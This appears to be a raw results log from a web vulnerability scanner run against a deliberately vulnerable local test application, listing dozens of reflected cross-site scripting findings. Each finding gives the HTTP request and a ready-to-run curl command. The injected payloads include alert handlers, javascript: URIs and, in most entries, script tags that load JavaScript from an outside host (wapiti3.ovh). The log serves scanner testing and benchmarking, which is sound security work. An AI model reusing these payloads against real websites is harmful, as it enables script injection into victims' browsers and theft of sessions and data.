GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp?userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjfpduapn0%22%29%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp?userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjfpduapn0%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp?userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3qqmi2lb3z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp?userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3qqmi2lb3z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwlzb002c8m%2C1%29%3B HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwlzb002c8m%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxn8zfrqlq%2C1%29%3B HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxn8zfrqlq%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwmje1rac3k%2C1%29%3B HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwmje1rac3k%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwq2crh02sj%2C1%29%3B HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwq2crh02sj%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwniobe2j6b%2C1%29%3B HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwniobe2j6b%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwyh1qh9iwd%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwyh1qh9iwd%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwd1dawtgfk%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwd1dawtgfk%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwawac3ts4w%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwawac3ts4w%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwn1sqbq2f7%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwn1sqbq2f7%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwqqaxituqk%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwqqaxituqk%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw6thtea3y0%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw6thtea3y0%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw5h1pvuv2h%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw5h1pvuv2h%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cwh2wr3zvjm%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cwh2wr3zvjm%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwero7umnkrz.js%3E%3C%2Fscript%3E&userinput2=1234 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwero7umnkrz.js%3E%3C%2Fscript%3E&userinput2=1234"
XSS vulnerability found via injection in the parameter userinput2
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=1234&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwofu8rfjfsz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=1234&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwofu8rfjfsz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwe05bh42j6z.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwe05bh42j6z.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw5lwa7qa3kz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw5lwa7qa3kz.js%3E%3C%2Fscript%3E" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp"
XSS vulnerability found via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8g93to68z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8g93to68z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2vxjkjn27z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2vxjkjn27z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8hub1vo6z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8hub1vo6z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnjpvkkg1az.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnjpvkkg1az.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwmkihi0eqfz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwmkihi0eqfz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwougl9ctlgz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwougl9ctlgz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb1v6aeaghz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb1v6aeaghz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhiivm3naz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhiivm3naz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwicyaqslgcz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwicyaqslgcz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwznybuw8qcz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwznybuw8qcz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuxv90jgcsz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuxv90jgcsz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2a6jvrrp2z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2a6jvrrp2z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwhmjtiy1mqz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwhmjtiy1mqz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wbnjaw4fhl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wbnjaw4fhl%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm8a6tjn84z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm8a6tjn84z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wg22nthg3u%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wg22nthg3u%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwprjjo043yz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwprjjo043yz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27ww0eh4uyt1%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27ww0eh4uyt1%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6ihak8zsjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6ihak8zsjz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw61t9egj0ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw61t9egj0ez.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wh2jhcx9fe%27%29%3C%2Fscript%3E
